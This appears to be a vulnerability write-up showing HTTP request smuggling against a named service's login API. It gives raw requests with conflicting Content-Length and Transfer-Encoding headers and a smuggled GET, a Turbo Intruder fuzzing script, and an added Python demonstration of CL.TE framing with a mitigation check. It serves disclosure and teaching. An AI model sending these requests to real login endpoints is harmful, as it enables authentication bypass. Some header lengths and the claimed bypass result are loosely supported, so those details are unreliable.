Request smuggling in the login function
Original request:
POST /api/sessions HTTP/1.1
Host: console.helium.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://console.helium.com/login
Content-Type: application/json
Content-Length: 109
DNT: 1
Connection: close
Cookie: key=value

{"session":{"email":"[email protected]","password":"sdfsdf"}}
Response: 401
Step 2:
POST /api/sessions HTTP/1.1
Host: console.helium.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://console.helium.com/login
Content-Type: application/json
Content-Length: 109
DNT: 1
Connection: close
Cookie: key=value
Transfer-Encoding: chunked

39
{"session":{"email":"[email protected]","password":"sdfsdf"}}
00
Response: still 401
Step 3:
POST /api/sessions HTTP/1.1
Host: console.helium.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://console.helium.com/login
Content-Type: application/json
Content-Length: 109
DNT: 1
Connection: close
Cookie: key=value
Transfer-Encoding: chunked

39
{"session":{"email":"[email protected]","password":"sdfsdf"}}
00
GET / HTTP/1.1
Host: www.helium.com
foo: x
Note: the 39 above is a hexadecimal chunk size (0x39 = 57 decimal), as required by chunked encoding; it gives the length of the chunk that follows.
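The desync that steps 2 and 3 rely on, as an added example that is not part of the original write-up: a constructed request in the shape of step 3 (both Content-Length and Transfer-Encoding present; hosts, credentials and the trailing GET are placeholders, and the chunk size is computed rather than hard-coded) is framed once the way a front end that honours Content-Length reads it and once the way a back end that honours chunked encoding reads it. The front end forwards everything as one body, the back end stops at the 0 chunk and leaves the GET as the start of a second request, which is why a request carrying both headers should be rejected rather than forwarded.

```python
# Added example: how a CL.TE front end / back end pair frame the same bytes
# differently. All values are constructed placeholders, not the write-up's.
def split_headers(raw):
    """Return (request line, {lower-cased name: value}, body) for one request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def frame_by_content_length(raw):
    """Front-end view: body is exactly Content-Length bytes; rest is leftover."""
    _, h, body = split_headers(raw)
    n = int(h[b"content-length"])
    return body[:n], body[n:]

def frame_by_chunked(raw):
    """Back-end view: body ends at the 0-size chunk; whatever follows is
    leftover and is read as the start of the next request on the connection."""
    _, _, body = split_headers(raw)
    out, pos = b"", 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end], 16)  # chunk size is hexadecimal
        pos = line_end + 2
        if size == 0:
            pos = body.index(b"\r\n", pos) + 2  # skip the empty trailer section
            return out, body[pos:]
        out += body[pos:pos + size]
        pos += size + 2  # skip chunk data and its trailing CRLF

def is_ambiguous(raw):
    """Mitigation check: both headers present means no single framing exists;
    such a request should be rejected (RFC 7230 section 3.3.3), not forwarded."""
    _, h, _ = split_headers(raw)
    return b"content-length" in h and b"transfer-encoding" in h

# Constructed request in the shape of step 3 above (chunk size computed).
JSON = b'{"session":{"email":"user@example.com","password":"placeholder"}}'
SMUGGLED = b"GET / HTTP/1.1\r\nHost: www.example.com\r\nfoo: x"
BODY = b"%x\r\n%s\r\n0\r\n\r\n%s" % (len(JSON), JSON, SMUGGLED)
RAW = (b"POST /api/sessions HTTP/1.1\r\nHost: console.example.com\r\n"
       b"Content-Type: application/json\r\nContent-Length: %d\r\n"
       b"Transfer-Encoding: chunked\r\n\r\n" % len(BODY)) + BODY

if __name__ == "__main__":
    print("front end leftover:", frame_by_content_length(RAW)[1])
    print("back end leftover: ", frame_by_chunked(RAW)[1])
```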
This step uses a Burp extension: Turbo Intruder (the same extension normally used for concurrency testing).
Select the x (the value of the foo header), right-click and send it to Turbo Intruder.
The following script can be used:
# Runs inside Burp's Turbo Intruder (Jython): RequestEngine, randstr and table
# are provided by the extension, not imported here.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=50,
                           pipeline=False)
    # A few random values first, so the engine learns what a "boring" response looks like
    for i in range(3, 8):
        engine.queue(target.req, randstr(i), learn=1)
    engine.queue(target.req, target.baseInput, learn=2)
    # Then one request per line of the wordlist (the path is a placeholder)
    with open('/yourpath/to/dict/alphabet.txt') as wordlist:
        for word in wordlist:
            engine.queue(target.req, word.rstrip())

def handleResponse(req, interesting):
    # Every response is added to the table, not only the "interesting" ones
    table.add(req)
The wordlist above can be generated with a simple script of your own; it mainly contains letters and digits, nothing complicated.
Then click Attack to launch the requests; the final result is shown below:
Several of the responses came back 200, showing that the 401 was bypassed.